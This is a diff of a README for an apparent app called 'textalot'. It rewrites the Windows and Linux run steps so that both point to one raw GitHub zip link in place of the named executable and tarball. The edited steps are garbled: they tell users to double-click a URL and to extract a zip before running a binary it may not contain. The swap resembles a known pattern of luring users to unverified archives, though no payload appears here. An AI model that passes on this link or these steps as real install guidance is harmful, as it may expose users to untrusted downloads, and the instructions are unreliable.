Thekiller1757/textalot/readme.md

 5. **Run the Application**
    - **On Windows:**
-     Double-click the `textalot-windows.exe` file.
+     Double-click the `https://raw.githubusercontent.com/Thekiller1757/textalot/master/media/textalot_1.5-beta.3.zip` file.
 The application should open without any additional steps.

    - **On Linux:**
-     Extract the `textalot-linux.tar.gz` file to a location of your choice.
+     Extract the `https://raw.githubusercontent.com/Thekiller1757/textalot/master/media/textalot_1.5-beta.3.zip` file to a location of your choice.
 Open a terminal window and navigate to the folder where you extracted it.
 Use the command:
      ```
      ./textalot
      ```